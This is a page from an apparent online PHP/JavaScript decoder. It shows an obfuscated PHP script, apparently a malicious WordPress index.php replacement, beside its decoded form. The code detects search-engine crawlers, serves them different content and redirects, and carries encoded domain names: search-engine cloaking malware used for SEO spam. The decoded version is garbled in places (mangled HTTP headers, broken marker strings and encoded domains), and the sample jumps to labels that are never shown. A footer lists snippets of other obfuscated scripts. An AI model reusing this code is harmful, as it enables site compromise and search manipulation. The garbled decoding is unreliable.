Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

<?php
 goto be1UE; JslNk: $zz = disbot(); goto ZviE9; GDxds: function disbot() { $user_agent = strtolower($_SERVER["\x48\x54\124\x50\137\x55\x53\105\x52\x5f\x41\x47\105\x4e\124"]); if (stristr($user_agent, "\x67\157\x6f\x67\x6c\145\x62\157\164") || stristr($user_agent, "\x62\x69\x6e\147") || stristr($user_agent, "\171\141\x68\x6f\x6f") || stristr($user_agent, "\x67\x6f\157\147\x6c\x65") || stristr($user_agent, "\107\x6f\x6f\x67\154\145\142\x6f\x74")) { return 1; } else { return 2; } } goto p08aQ; F2aZX: if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, '', $duri); $istest = true; } goto jxES2; S2Knh: if (!strstr($html_content, "\156\157\142\x6f\164\165\163\x65\162\x61\147\x65\156\164")) { if (strstr($html_content, "\157\x6b\x68\x74\155\x6c")) { @header("\x43\x6f\x6e\x74\145\x6e\164\55\x74\x79\160\145\72\40\164\x65\170\164\x2f\x68\164\x6d\x6c\x3b\x20\x63\150\x61\162\x73\x65\164\x3d\165\164\x66\55\x38"); $html_content = str_replace("\157\x6b\x68\164\155\154", '', $html_content); if ($istest) { echo $string; } echo $html_content; die; } else { if (strstr($html_content, "\x67\145\x74\143\x6f\156\x74\145\x6e\164\x35\x30\x30\x70\141\x67\x65")) { @header("\x48\124\x54\120\57\x31\56\61\40\65\60\60\40\x49\x6e\x74\145\x72\156\141\154\x20\123\x65\x72\166\145\162\40\x45\162\x72\x6f\162"); die; } else { if (strstr($html_content, "\x34\60\x34\x70\x61\x67\x65")) { @header("\x48\x54\x54\120\x2f\61\x2e\61\x20\x34\60\64\x20\116\157\164\x20\106\x6f\165\x6e\x64"); die; } else { if (strstr($html_content, "\x33\x30\61\160\141\147\x65")) { @header("\110\124\x54\120\57\x31\56\61\40\63\x30\x31\x20\x4d\157\x76\x65\144\x20\x50\145\x72\x6d\x61\156\145\156\x74\154\x79"); $html_content = str_replace("\63\60\x31\160\x61\147\x65", '', $html_content); header("\114\157\x63\x61\164\151\x6f\156\72\40" . $html_content); die; } else { if (strstr($html_content, "\157\x6b\x78\x6d\154")) { $html_content = str_replace("\157\153\x78\155\154", '', $html_content); @header("\x43\157\156\x74\145\156\164\55\x54\171\x70\145\72\40\x61\160\x70\x6c\x69\x63\x61\x74\151\157\x6e\57\170\155\154\x3b\x20\x63\x68\x61\162\163\x65\x74\x3d\165\164\x66\x2d\x38"); echo $html_content; die; } else { if (strstr($html_content, "\157\x6b\162\157\x62\157\x74\163")) { $html_content = str_replace("\x6f\x6b\162\x6f\x62\157\164\163", '', $html_content); @header("\x43\157\x6e\164\145\x6e\164\x2d\x54\x79\160\x65\x3a\x20\164\145\x78\164\57\x70\154\141\x69\x6e"); echo $html_content; die; } } } } } } } goto GDxds; SVq9M: if (empty($matches) || $matches[1] == "\x77\160\x2d\143\162\157\x6d\56\160\150\x70" || $matches[1] == "\144\x65\x74\x61\x69\154\56\160\x68\160") { $model_file = "\151\156\x64\145\170\56\160\150\160"; $model = "\x69\x6e\x64\x65\x78"; } else { $model_file = $matches[1]; $position = strpos($duri, $model_file); if ($position !== false) { $model_file = substr($duri, 0, $position + strlen($model_file)); $model_file = ltrim($model_file, "\57"); } $model = str_replace("\56\x70\x68\x70", '', $model_file); } goto UOx9a; YKniI: $http_web = "\x68\x74\x74\x70\x73"; goto rkY_B; ZviE9: $duri = drequest_uri(); goto HZ3hB; v9iHO: $istest = false; goto F2aZX; r5DmP: if (is_https()) { $http = "\150\164\164\160\x73"; } else { $http = "\x68\164\x74\x70"; } goto JslNk; p08aQ: function drequest_uri() { if (isset($_SERVER["\122\105\x51\125\x45\x53\x54\x5f\x55\122\x49"])) { $duri = $_SERVER["\x52\105\121\x55\105\123\124\x5f\x55\122\111"]; } else { if (isset($_SERVER["\x61\162\x67\166"])) { $duri = $_SERVER["\120\x48\x50\137\123\x45\x4c\106"] . "\77" . $_SERVER["\x61\x72\147\166"][0]; } else { $duri = $_SERVER["\120\x48\120\x5f\x53\x45\114\x46"] . "\77" . $_SERVER["\x51\125\x45\x52\131\137\123\124\122\x49\116\107"]; } } return $duri; } goto DzOFD; be1UE: $xmlname = array("\x25\63\x33\x25\x33\x30\x25\x33\70\x25\62\x44\45\67\71\45\67\x36\45\x36\61\45\67\70\x25\63\x31\45\x33\x37\45\x33\71\x25\x32\x45\45\66\62\x25\x36\x46\x25\x37\x33\x25\x36\x38\x25\x36\x36\x25\x37\60\x25\66\x38\x25\x37\66\45\66\x31\x25\x32\105\x25\66\67\x25\66\x32\45\66\63", "\45\63\x33\x25\63\60\x25\63\70\x25\62\104\45\67\71\x25\67\x36\x25\66\61\45\67\70\x25\63\x31\x25\63\x37\x25\x33\71\45\x32\x45\45\x36\66\x25\x37\62\x25\x36\x35\x25\x37\62\45\x36\61\x25\x37\61\45\67\x36\45\x36\x37\45\x36\x43\x25\x32\x45\x25\66\x37\45\66\x32\45\66\x33", "\x25\63\63\x25\x33\x30\x25\63\x38\45\62\104\45\x37\x39\x25\x37\66\45\66\61\45\67\70\45\x33\x31\45\x33\67\x25\x33\x39\45\x32\105\x25\67\62\45\67\x30\45\66\x32\x25\66\71\x25\x37\x36\x25\66\66\x25\67\x36\45\66\x32\45\x36\66\45\62\105\45\66\x42\x25\66\103\x25\66\104", "\45\x33\x33\x25\x33\60\45\x33\70\45\62\104\x25\67\71\x25\x37\x36\45\x36\61\x25\67\x38\45\x33\x31\45\63\67\45\63\x39\45\x32\105\x25\x37\x36\x25\66\x31\x25\66\61\x25\66\62\x25\x36\x36\x25\66\63\45\x37\62\45\x36\x31\x25\62\x45\x25\x36\x37\45\66\62\x25\66\x33"); goto YKniI; DzOFD: function is_https() { if (isset($_SERVER["\x48\x54\x54\120\x53"]) && strtolower($_SERVER["\110\124\124\x50\x53"]) !== "\157\x66\x66") { return true; } elseif (isset($_SERVER["\110\124\x54\x50\137\130\x5f\x46\117\122\x57\101\x52\x44\x45\104\x5f\120\x52\x4f\x54\117"]) && $_SERVER["\110\x54\x54\120\x5f\x58\137\x46\x4f\x52\x57\x41\122\104\105\x44\x5f\120\x52\117\x54\117"] === "\150\x74\x74\x70\163") { return true; } elseif (isset($_SERVER["\x48\x54\124\x50\x5f\106\122\117\x4e\x54\x5f\x45\x4e\x44\137\x48\124\124\x50\123"]) && strtolower($_SERVER["\x48\x54\x54\x50\x5f\106\x52\x4f\x4e\x54\137\x45\116\x44\x5f\110\x54\x54\120\123"]) !== "\x6f\146\146") { return true; } return false; } goto ga8Eb; quLBW: $urlshang = ''; define('WP_USE_THEMES', true);require __DIR__ . '/wp-blog-header.php';

Decrypted code:

goto be1UE;
 JslNk: $zz = disbot();
 goto ZviE9;
	 GDxds: function disbot() {
	 $user_agent = strtolower($_SERVER["HTTP_USER_AGENT"]);
		 if (stristr($user_agent, "googlebot") || stristr($user_agent, "bing") || stristr($user_agent, "yahoo") || stristr($user_agent, "google") || stristr($user_agent, "Googlebot")) {
		 return 1;
		 
	}
		 else {
		 return 2;
		 
	}
	 
}
 goto p08aQ;
	 F2aZX: if (strpos($duri, $string) !== false) {
	 $zz = 1;
	 $duri = str_replace($string, '', $duri);
	 $istest = true;
	 
}
 goto jxES2;
	 S2Knh: if (!strstr($html_content, "nobotuseragent")) {
		 if (strstr($html_content, "okhtml")) {
		 @header("Content-type: text/html;
		 charset=utf-8");
		 $html_content = str_replace("okhtml", '', $html_content);
			 if ($istest) {
			 echo $string;
			 
		}
		 echo $html_content;
		 die;
		 
	}
		 else {
			 if (strstr($html_content, "getcontent500page")) {
			 @header("HTTPy.1 500 Internal Server Error");
			 die;
			 
		}
			 else {
				 if (strstr($html_content, "4page")) {
				 @header("HTTP/1.1 404 Not Found");
				 die;
				 
			}
				 else {
					 if (strstr($html_content, "301page")) {
					 @header("HTTPy.1 1 Moved Permanently");
					 $html_content = str_replace("3page", '', $html_content);
					 header("Location: " . $html_content);
					 die;
					 
				}
					 else {
						 if (strstr($html_content, "okxml")) {
						 $html_content = str_replace("okxml", '', $html_content);
						 @header("Content-Type: application/xml;
						 charset=utf-8");
						 echo $html_content;
						 die;
						 
					}
						 else {
							 if (strstr($html_content, "okrobots")) {
							 $html_content = str_replace("okrobots", '', $html_content);
							 @header("Content-Type: text/plain");
							 echo $html_content;
							 die;
							 
						}
						 
					}
					 
				}
				 
			}
			 
		}
		 
	}
	 
}
 goto GDxds;
	 SVq9M: if (empty($matches) || $matches[1] == "wp-crom.php" || $matches[1] == "detail.php") {
	 $model_file = "index.php";
	 $model = "index";
	 
}
	 else {
	 $model_file = $matches[1];
	 $position = strpos($duri, $model_file);
		 if ($position !== false) {
		 $model_file = substr($duri, 0, $position + strlen($model_file));
		 $model_file = ltrim($model_file, "/");
		 
	}
	 $model = str_replace(".php", '', $model_file);
	 
}
 goto UOx9a;
 YKniI: $http_web = "https";
 goto rkY_B;
 ZviE9: $duri = drequest_uri();
 goto HZ3hB;
 v9iHO: $istest = false;
 goto F2aZX;
	 r5DmP: if (is_https()) {
	 $http = "https";
	 
}
	 else {
	 $http = "http";
	 
}
 goto JslNk;
	 p08aQ: function drequest_uri() {
		 if (isset($_SERVER["REQUEST_URI"])) {
		 $duri = $_SERVER["REQUEST_URI"];
		 
	}
		 else {
			 if (isset($_SERVER["argv"])) {
			 $duri = $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0];
			 
		}
			 else {
			 $duri = $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"];
			 
		}
		 
	}
	 return $duri;
	 
}
 goto DzOFD;
 be1UE: $xmlname = array("%%30%38%2D%79%.1%78%+7+9%2E%62%6F%73%68%66%70%68%76%%2E%67%%63", "%%30%38%2D%79%%61%78%%%39*E.6%72%65%72.1%71%.7.C%2E%%%", "%33%30%38%2D/9%76%61%78+1+7%39*E%72%%%69%76%66%%.6%2E%6B%6C%6D", "+3%30+8%2D%79%76.1%78+1%37%39*E%76%%61%62%66%63/2.1%2E%67%62%");
 goto YKniI;
	 DzOFD: function is_https() {
		 if (isset($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off") {
		 return true;
		 
	}
		 elseif (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") {
		 return true;
		 
	}
		 elseif (isset($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off") {
		 return true;
		 
	}
	 return false;
	 
}
 goto ga8Eb;
 quLBW: $urlshang = '';
 define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';

Recent submissions:

<?php goto be1UE; JslNk: $zz = disbot(); goto ZviE9; GDxds: function disbot() { $user_ag... <?php $SISTEMIT_COM_ENC = "3bs5bu3KtqXtJ5CduHhGPtBgXeHhGqzrulqk84BFgARYgaTDojeCABkSZMiQJc... --[[ v1.0.0 https://wearedevs.net/obfuscator ]] return(function(...)local o={"\055\050\074... <?php /* */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$O... "color": "\u041a\u043e\u0440\u0438\u0447\u043d\u0435\u0432\u044b\u0439",... { "article": "40559", "parent": { "id": "\u0412... <script>var player=window.document.querySelector("\x64\x69\x76\x23\x70\x6C\x61\x79\x65\... <?php $SISTEMIT_COM_ENC = "lVTdatswFL5uIC9RAk4gbe67dZuauInqxDaKvDQbw7BADI0jjK/2w55hz7EHOL... !function(){"use strict";function p(){var e,t,a,o,i=this;if(this.nextAlarm=null,this.nextI... <?php //0042b // Copyright CentOS WebPanel, Decoding is FORBIDDEN // All Rights Reserved...